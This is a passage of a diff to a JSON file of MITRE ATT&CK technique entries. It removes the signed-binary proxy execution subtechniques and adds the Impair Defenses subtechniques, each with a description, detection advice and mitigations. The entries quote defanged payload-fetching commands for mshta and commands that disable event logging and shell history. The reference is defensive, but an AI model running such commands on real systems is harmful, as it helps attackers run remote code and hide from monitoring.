+            "IaaS",
+            "Linux",
+            "Network",
+            "Office 365",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
+            "Cloud Service: Cloud Service Disable",
+            "Cloud Service: Cloud Service Modification",
             "Command: Command Execution",
-            "File: File Creation",
-            "Module: Module Load",
-            "Network Traffic: Network Connection Creation",
-            "Process: OS API Execution",
+            "Firewall: Firewall Disable",
+            "Firewall: Firewall Rule Modification",
             "Process: Process Creation",
+            "Process: Process Termination",
+            "Script: Script Execution",
+            "Sensor Health: Host Status",
+            "Service: Service Metadata",
+            "Windows Registry: Windows Registry Key Deletion",
             "Windows Registry: Windows Registry Key Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1218.001",
-                "name": "Signed Binary Proxy Execution: Compiled HTML File",
-                "url": "https://attack.mitre.org/techniques/T1218/001",
-                "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
-                "detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    }
-                ]
-            },
-            {
-                "tid": "T1218.002",
-                "name": "Signed Binary Proxy Execution: Control Panel",
-                "url": "https://attack.mitre.org/techniques/T1218/002",
-                "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)",
-                "detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)",
+                "tid": "T1562.001",
+                "name": "Impair Defenses: Disable or Modify Tools",
+                "url": "https://attack.mitre.org/techniques/T1562/001",
+                "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)",
+                "detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\n\nLack of expected log events may be suspicious.",
                 "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
                     {
                         "mid": "M1022",
                         "name": "Restrict File and Directory Permissions",
                         "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                         "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1218.003",
-                "name": "Signed Binary Proxy Execution: CMSTP",
-                "url": "https://attack.mitre.org/techniques/T1218/003",
-                "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
-                "detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
-            {
-                "tid": "T1218.004",
-                "name": "Signed Binary Proxy Execution: InstallUtil",
-                "url": "https://attack.mitre.org/techniques/T1218/004",
-                "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
-                "detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
-            {
-                "tid": "T1218.005",
-                "name": "Signed Binary Proxy Execution: Mshta",
-                "url": "https://attack.mitre.org/techniques/T1218/005",
-                "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
-                "detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1218.007",
-                "name": "Signed Binary Proxy Execution: Msiexec",
-                "url": "https://attack.mitre.org/techniques/T1218/007",
-                "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)",
-                "detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
+                "tid": "T1562.002",
+                "name": "Impair Defenses: Disable Windows Event Logging",
+                "url": "https://attack.mitre.org/techniques/T1562/002",
+                "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
+                "detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)  \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1218.008",
-                "name": "Signed Binary Proxy Execution: Odbcconf",
-                "url": "https://attack.mitre.org/techniques/T1218/008",
-                "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
-                "detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
+                "tid": "T1562.003",
+                "name": "Impair Defenses: Impair Command History Logging",
+                "url": "https://attack.mitre.org/techniques/T1562/003",
+                "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
+                "detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. ",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1039",
+                        "name": "Environment Variable Permissions",
+                        "description": "Prevent modification of environment variables by unauthorized users and groups.",
+                        "url": "https://attack.mitre.org/mitigations/M1039"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
                     }
                 ]
             },
             {
-                "tid": "T1218.009",
-                "name": "Signed Binary Proxy Execution: Regsvcs/Regasm",
-                "url": "https://attack.mitre.org/techniques/T1218/009",
-                "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
-                "detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+                "tid": "T1562.004",
+                "name": "Impair Defenses: Disable or Modify System Firewall",
+                "url": "https://attack.mitre.org/techniques/T1562/004",
+                "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ",
+                "detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1218.010",
-                "name": "Signed Binary Proxy Execution: Regsvr32",
-                "url": "https://attack.mitre.org/techniques/T1218/010",
-                "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
-                "detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
+                "tid": "T1562.006",
+                "name": "Impair Defenses: Indicator Blocking",
+                "url": "https://attack.mitre.org/techniques/T1562/006",
+                "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
+                "detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}",
                 "mitigations": [
                     {
-                        "mid": "M1050",
-                        "name": "Exploit Protection",
-                        "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                        "url": "https://attack.mitre.org/mitigations/M1050"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1218.011",
-                "name": "Signed Binary Proxy Execution: Rundll32",
-                "url": "https://attack.mitre.org/techniques/T1218/011",
